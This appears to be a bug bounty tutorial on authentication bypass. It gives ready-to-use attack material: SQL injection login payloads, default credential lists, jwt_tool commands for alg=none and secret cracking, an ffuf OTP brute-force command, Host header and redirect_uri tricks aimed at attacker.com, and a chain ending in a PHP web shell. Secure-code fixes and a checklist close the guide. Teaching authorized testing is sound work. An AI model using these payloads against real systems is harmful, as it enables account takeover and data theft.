π Bug Bounty Series
Authentication Bypass β
Complete Bug Bounty Guide 2026
Authentication Bypass lets attackers access accounts, admin panels, and sensitive data without valid credentials. This guide covers every technique β SQL injection, JWT bypass, default credentials, MFA bypass, OAuth flaws, and more.
π Table of Contents
π What is Authentication Bypass?
Authentication Bypass occurs when an attacker gains access to a system, account, or protected resource without providing valid credentials. The application’s authentication mechanism is circumvented β not by guessing the correct password, but by finding a way to skip or trick the verification step entirely.
Authentication Bypass β attacker accesses protected resources without valid credentials
π‘ Core Concept
Authentication Bypass is not about guessing passwords β it is about finding flaws that let you skip or trick the authentication step. SQL injection makes the password check always true. JWT bypass creates a forged token. Default credentials mean nobody changed the factory password. All lead to the same result: full unauthorized access.
πΆ Beginner Explanation
Imagine a door with a lock. Authentication Bypass means you get through without the key β not by breaking the lock, but by finding a hidden entrance, or by convincing the doorman you already showed your ID. With SQL injection, you tell the lock ' OR 1=1-- which makes it think any password is correct. The door opens. You are in.
β‘ 10 Types of Authentication Bypass
π SQL Injection
Inject
CRITICAL
' OR 1=1-- in username β makes WHERE clause always trueπ Default Credentials
Login with admin:admin, root:root β unchanged factory passwords
CRITICAL
πͺ Forced Browsing
Access /admin/dashboard directly β no server-side auth check on route
CRITICAL
π JWT Bypass (alg=none)
Strip signature, set algorithm to none β server accepts unsigned token
CRITICAL
π Response Manipulation
Change
HIGH
false β true in login response β auth in frontend onlyπ§ Password Reset Abuse
Reset endpoint returns session without email verification
CRITICAL
π Token Forgery / Replay
Reuse expired or stolen session token β not properly invalidated
HIGH
π OAuth Misconfiguration
Missing state parameter β CSRF β login as victim
CRITICAL
π± MFA Bypass
Skip OTP step by hitting post-MFA endpoint directly
CRITICAL
𧩠Logic Flaw Bypass
Set step=3 in multi-step auth β prior steps never validated
CRITICAL
π Authentication Bypass β Quick Reference
| Field | Details |
|---|---|
| Vulnerability | Authentication Bypass |
| Also Known As | Auth Bypass, Login Bypass, Broken Authentication, Credential Bypass |
| OWASP | A07:2021 β Identification and Authentication Failures |
| CVE Score | 8.0 β 10.0 (almost always Critical) |
| Severity | Critical β no credentials = full unauthorized access |
| Root Cause | Improper input validation; client-side auth logic; JWT not verified; default creds unchanged |
| Where to Check | /login, /api/auth, JWT tokens, OAuth flows, /admin, password reset, MFA endpoints |
| Best Tools | Burp Suite, SQLMap, jwt_tool, Hydra, ffuf, curl, Postman |
| Practice Labs | PortSwigger Authentication Labs, PortSwigger JWT Labs, DVWA, HackTheBox, TryHackMe |
| Difficulty | Beginner (default creds, SQLi) | Intermediate (JWT, response manipulation) | Advanced (OAuth, logic flaws) |
| Post Exploitation | Access all user accounts | Admin panel | Full DB export | Pivot to RCE via file upload |
| Related Vulns | Vertical Privilege Escalation, Information Disclosure, Forced Browsing |
π SQL Injection Authentication Bypass β Payload Table
SQL injection auth bypass works when the login query concatenates user input directly. These payloads make the WHERE clause always evaluate to true, granting access without a valid password.
| Payload | Type | Why It Works |
|---|---|---|
| ‘ OR 1=1– | Classic MySQL | WHERE clause always true, — comments out password check |
| ‘ OR ‘1’=’1 | No comment needed | String comparison always evaluates true |
| admin’– | Target specific user | Comments out password check for admin account only |
| ” OR “”=”” | Double-quote variant | For apps that use double quotes around parameters |
| ‘ OR 1=1# | MySQL hash comment | Alternative comment syntax, works in MySQL |
| ‘) OR (‘1’=’1 | Parenthesis bypass | For queries wrapped in extra parentheses |
| ‘ OR 1=1 LIMIT 1– | Limit variant | When multiple rows cause an application error |
| ‘ UNION SELECT 1,1– | UNION-based | When query result must match specific column count |
How SQLi Auth Bypass Works
# Vulnerable query β developer concatenates input directly: query = "SELECT * FROM users WHERE username='" + user + "' AND password='" + pwd + "'" # Attacker sends: username = admin'-- # Query becomes: SELECT * FROM users WHERE username='admin'--' AND password='anything' # ^^ comments out the password check # Result: logs in as admin without any password # Fix: use parameterized queries / prepared statements
π§ Manual Testing for Authentication Bypass
Phase 1 β SQL Injection Auth Bypass
Test This First
1
Intercept Login Request in Burp
Enable Burp Proxy β submit login form β capture in HTTP History β send to Repeater (Ctrl+R).
2
Inject SQLi Payloads in Username Field
Replace username with each SQLi payload. Keep password as anything. A 200 OK with Set-Cookie = bypass confirmed.
SQLi Auth Bypass Tests
# Test 1 β classic bypass username=' OR 1=1--&password=anything # Test 2 β target admin specifically username=admin'--&password=anything # Test 3 β JSON-based login {"username": "admin'--", "password": "anything"} # Test 4 β both fields username=' OR '1'='1&password=' OR '1'='1 # Success indicators: HTTP/1.1 200 OK + Set-Cookie: session=xxxx HTTP/1.1 302 β /dashboard Response body contains username/email of user
Phase 2 β Default Credentials
Default Credentials to Try
# Universal defaults β try ALL: admin:admin admin:password admin:admin123 admin:123456 root:root root:toor administrator:administrator test:test guest:guest demo:demo user:user # Platform-specific defaults: Jenkins: admin:admin Tomcat: tomcat:tomcat | admin:s3cret Grafana: admin:admin WordPress: admin:admin phpMyAdmin: root:(blank password) Jira: admin:admin
Phase 3 β Response Manipulation
3
Modify Server Response Before Browser Receives It
In Burp: right-click login request β “Intercept response to this request”. Send wrong password. Modify response before forwarding to browser.
Response Manipulation
# Original response (wrong password): HTTP/1.1 401 Unauthorized {"success": false, "authenticated": false} # Modified before forwarding: HTTP/1.1 200 OK {"success": true, "authenticated": true} # Forward β if dashboard loads = frontend-only auth confirmed # Then test if backend API calls also work = full bypass
Phase 4 β JWT Authentication Bypass
JWT Bypass β Step by Step
# Step 1: Decode JWT (find in Authorization header or Cookie) python3 jwt_tool.py YOUR_TOKEN # Or: echo "payload" | base64 -d # Typical payload: {"user_id": 1001, "role": "user", "exp": 9999999999} # Attack 1: alg=none (no signature required) python3 jwt_tool.py TOKEN -X a # Attack 2: Tamper role claim interactively python3 jwt_tool.py TOKEN -T # Change: role: "user" β role: "admin" # Attack 3: Crack weak HMAC secret python3 jwt_tool.py TOKEN -C -d /usr/share/wordlists/rockyou.txt
Phase 5 β Password Reset Logic Flaw
Password Reset Bypass Tests
# Test 1: Get session token from reset without clicking email link POST /api/password/reset {"email": "victim@target.com"} # Does response include session token? β CRITICAL # Test 2: Use your reset token for another user's account POST /api/password/reset/confirm {"token": "YOUR_VALID_TOKEN", "user_id": 1002, "new_password": "hacked"} # Test 3: Host header injection β steal reset link POST /api/password/reset Host: attacker.com {"email": "victim@target.com"} # Victim's reset email links to attacker.com
Phase 6 β MFA Bypass
MFA Bypass Techniques
# Bypass 1: Skip MFA step β hit post-MFA endpoint directly # After password: instead of POST /mfa/verify GET /dashboard β try going here directly # Bypass 2: Response manipulation at MFA step {"mfa_required": true} β change to β {"mfa_required": false} # Bypass 3: Brute-force 6-digit OTP (if no rate limit) ffuf -u https://target.com/mfa/verify \ -X POST \ -d '{"otp":"FUZZ"}' \ -w <(seq -w 000000 999999) \ -mc 200 # Bypass 4: Null / empty OTP value {"otp": null} | {"otp": ""} | {"otp": 0}
π€ Best Tools for Authentication Bypass Testing
π¬ Burp Suite
Intercept and modify login requests. Repeater for manual testing. Intruder for credential fuzzing.
Proxy β HTTP History β Send to Repeater
π SQLMap
Automated SQL injection detection and exploitation. Tests auth bypass automatically.
sqlmap -u URL --data "user=x&pass=y" --dbs
π jwt_tool
Full JWT attack suite β tamper mode, alg=none, algorithm confusion, secret cracking.
python3 jwt_tool.py TOKEN -T
π Hydra
Credential brute force for login forms, HTTP Basic Auth, and other protocols.
hydra -L users.txt -P pass.txt target http-post-form
π ffuf
Fast fuzzing for OTP brute force, credential testing, and endpoint discovery.
ffuf -u URL -d "otp=FUZZ" -w otps.txt -mc 200
π curl
Quick manual tests for SQLi payloads and default credentials from the command line.
curl -X POST URL -d "user=admin'--&pass=x"
π₯ Burp Suite β Authentication Bypass Guide
1
SQLi Bypass in Repeater
Capture login β Ctrl+R β replace username with
' OR 1=1-- β send. Look for 200 OK with Set-Cookie or redirect to /dashboard.2
Intercept Response β Flip Auth Boolean
Right-click login request β “Intercept response to this request” β turn Intercept on β send wrong credentials β modify
false β true in response β forward.3
Intruder β Credential Spray with Pitchfork
Send to Intruder (Ctrl+I) β mark
Β§adminΒ§ and Β§adminΒ§ β Attack type: Pitchfork β Payload 1: usernames, Payload 2: matching passwords β sort by response length.4
Decoder β Inspect JWT Token
Copy JWT from Authorization header β Burp Decoder β Decode as Base64 β read payload β look for
role, admin, isAdmin claims β tamper in jwt_tool.5
Match & Replace β Auto-Inject SQLi
Proxy β Options β Match and Replace β Request body: match
username=admin, replace with username=admin'-- β browse app β every request auto-injects payload.π£ Advanced Authentication Bypass Techniques
OAuth Authentication Bypass β Missing State Parameter
OAuth Auth Bypass
# Normal OAuth flow includes state validation: GET /oauth/authorize?client_id=xxx&state=RANDOM_VALUE GET /callback?code=AUTH_CODE&state=RANDOM_VALUE β verified # Attack: if state not verified β CSRF possible # Force victim to visit your crafted link # Their OAuth account links to attacker's app session # Attacker authenticates via Google as victim # Attack: open redirect in redirect_uri GET /oauth/authorize?redirect_uri=https://attacker.com/steal # Auth code sent to attacker β exchange for token β full access
Multi-Step Auth Logic Flaw β Skip Steps
Multi-Step Auth Bypass
# Normal flow: Step 1: POST /auth/step1 {username, password} Step 2: POST /auth/step2 {mfa_code} Step 3: GET /auth/complete β session created # Bypass: skip step 1 and 2, call step 3 directly GET /auth/complete β no prior token needed? # Or: manipulate step indicator in body POST /auth {"username": "admin", "password": "test", "step": 3, "mfa_verified": true}
Insecure Remember-Me Token Bypass
Remember-Me Token Analysis
# Check remember-me cookie value in browser DevTools remember_me=dXNlcjoxMDAxOjE3MDAwMDAwMDA= # Decode: echo 'dXNlcjoxMDAxOjE3MDAwMDAwMDA=' | base64 -d # Output: user:1001:1700000000 # Forge for another user: echo -n 'user:1002:1700000000' | base64 # Output: dXNlcjoxMDAyOjE3MDAwMDAwMDA= # Set forged cookie in browser β refresh β logged in as user 1002? # Unencrypted remember-me token = Authentication Bypass
π Real Authentication Bypass Bug Chains
SQLi Auth Bypass β Admin Access β Full DB Dump
Send ‘ OR 1=1– in username β login as admin β access /admin/export β dump all user data and credentials
CRITICAL π°
Default Credentials β Admin Panel β RCE
Login with admin:admin β admin panel has file upload β upload PHP shell β execute commands β full server compromise
CRITICAL π°
JWT alg=none β Forged Admin Token β Persistent Access
Decode JWT β strip signature β set alg=none β change role to admin β server accepts β persistent admin without any credentials
CRITICAL π°
Password Reset Abuse β Account Takeover at Scale
POST /api/auth/reset with victim@email.com β response returns session token without email verification β instant takeover of any account
CRITICAL π°
OAuth Missing State β CSRF β Login as Victim
State parameter not validated β forge OAuth flow β victim clicks link β attacker’s account linked β login as victim via attacker’s Google account
CRITICAL π°
MFA Bypass β Full Account Access Without OTP
After password step, POST /auth/complete directly β MFA check not enforced on this endpoint β full authenticated session granted
CRITICAL π°
π‘οΈ Defense Against Authentication Bypass
β
The Core Fixes
Use parameterized queries. Verify JWT signatures. Change all default credentials. Rate limit login. Enforce MFA on every path. Validate OAuth state. Never trust client-side auth.
Secure Code Examples
# SQL β use parameterized query (NEVER concatenate) # WRONG: query = "SELECT * FROM users WHERE user='" + user + "'" # CORRECT: cursor.execute("SELECT * FROM users WHERE user=?", (user,)) # JWT β always verify signature, reject alg=none jwt.decode(token, secret, algorithms=["HS256"], # whitelist ONLY options={"verify_signature": True}) # Rate limiting on login (Express.js) const rateLimit = require('express-rate-limit') app.use('/login', rateLimit({ windowMs: 15 * 60 * 1000, max: 5, # 5 attempts per 15 minutes message: 'Too many attempts' }))
π Developer Security Checklist
β Use parameterized queries β never concatenate user input in SQL
β JWT: whitelist allowed algorithms, verify signature, reject alg=none
β Change ALL default credentials before deploying to production
β Implement rate limiting: max 5 failed logins β lockout + CAPTCHA
β Password reset tokens: 15-minute expiry, single-use, tied to user ID
β MFA: enforce on EVERY path to post-MFA resources, not just the MFA page
β OAuth: always validate state parameter, whitelist redirect_uri exactly
β Session tokens: cryptographically random, HttpOnly, Secure, proper expiry
π Learn More β External Resources
π PortSwigger β Authentication Labs (20+ labs)
π PortSwigger β JWT Attack Labs
π OWASP A07:2021 β Authentication Failures
π jwt_tool β Full JWT Attack Suite on GitHub
π More from devtechnoblog.in
π Vertical Privilege Escalation Guide
π Sensitive Information Disclosure Guide
π Forced Browsing Complete Guide
π IDOR β Insecure Direct Object Reference
π§ Key Takeaways β Authentication Bypass
- Authentication Bypass is almost always Critical β no credentials = full unauthorized access
- Always test SQLi on login FIRST β simple, fast, and still works in 2024 on many targets
- Try default credentials on EVERY target β admin:admin still works on real production systems
- Test BOTH web UI and API endpoints separately β one may be protected while the other is not
- Response manipulation proves frontend-only auth β then verify backend actions also execute
- JWT alg=none and algorithm confusion are zero-interaction Critical bypasses β decode every JWT
- Password reset flows have the most logic flaws β test every parameter, host header, and expiry
- MFA bypass via direct endpoint access is extremely common β test post-MFA URLs without OTP
- OAuth missing state parameter = CSRF login as any victim β check every OAuth flow
- Always escalate impact: bypass login β show admin access β maximum bounty
π° Real Bounty β $12,500
In 2022, a password reset endpoint returned a full authenticated session token without verifying the reset link was clicked. POST /api/auth/reset with victim email = instant session. No email access needed. Any user’s account, instantly. Bounty paid: $12,500. One endpoint. One POST request. Full account takeover at scale.
